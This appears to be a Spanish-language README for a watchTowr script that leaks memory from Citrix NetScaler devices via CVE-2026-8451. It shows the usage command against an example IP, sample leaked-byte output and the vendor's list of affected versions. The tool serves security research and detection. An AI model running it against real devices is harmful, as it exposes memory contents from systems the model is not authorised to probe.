
¡Herramienta de generación de artefactos de detección de sobrelectura de Citrix Netscaler!
Este generador de artefactos de detección aceptará un dispositivo Netscaler objetivo e intentará filtrar memoria mediante CVE-2026-8451.
Todo lo que necesita es el sistema objetivo. Incluya el protocolo, p. ej. https://192.168.80.125.
Aquí hay un ejemplo de cómo filtra algo de memoria:
$ python3 watchTowr-vs-Netscaler-CVE-2026-8451.py https://192.168.80.125
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Netscaler-CVE-2026-8451.py
(*) CVE-2026-8451 Citrix Netscaler memory overread Detection Artifact Generator
- Aliz (@alizTheHax0r) of watchTowr (@watchTowrcyber)
Leaked bytes:
00000000 f0 0d 90 74 3d ef be ad de 41 41 41 41 41 41 41 |...t=....AAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
...
Según el aviso del proveedor:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Para las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs